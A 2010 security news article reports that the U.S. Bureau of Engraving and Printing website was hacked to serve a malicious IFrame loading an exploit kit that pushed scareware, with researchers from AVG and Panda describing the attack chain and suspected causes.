Part of a scareware distribution effort

May 4, 2010 14:29 GMT  ·  By

The website of the U.S. Department of Treasury Bureau of Engraving and Printing (BEP) was compromised by unknown attackers, who rigged it to infect visitors with malware. A malicious IFrame loading exploits from a third-party domain was injected into the index page.

The hack was discovered sometime on Sunday evening, but the affected website remained accessible for most of yesterday. While it was still online, the website could have been reached via three separate URLs: bep.treas.gov, bep.gov and moneyfactory.gov.

AVG was one of the first security vendors to report the compromise, through the voice of its Chief Research Officer, Roger Thompson, who revealed that a malicious IFrame was injected into the government website. "This iframe is used to silently load one of the elenore exploit kits main URL’s, which in turn determines what’s the best available exploitation method for the browser accessing the site," security researchers from Panda Security, who also analyzed the attack, explain.

Users are taken through a series of redirects, which determine if vulnerable software is installed on their computers. The exploit pack is able to target vulnerability in popular applications such as Adobe Reader or Java Runtime Environment.

If exploitation is successful, websites displaying fake security scans are repeatedly opened in the browser to trick users into downloading and installing scareware. This is a generic name given to applications that masquerade as antivirus programs and try to scare people into paying a license fee by making false claims about alleged infections on their computers.

Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks.

Photo Gallery (2 Images)

Bureau of Engraving and Printing website compromised
Malicious IFrame injected into Bureau of Engraving and Printing website
Open gallery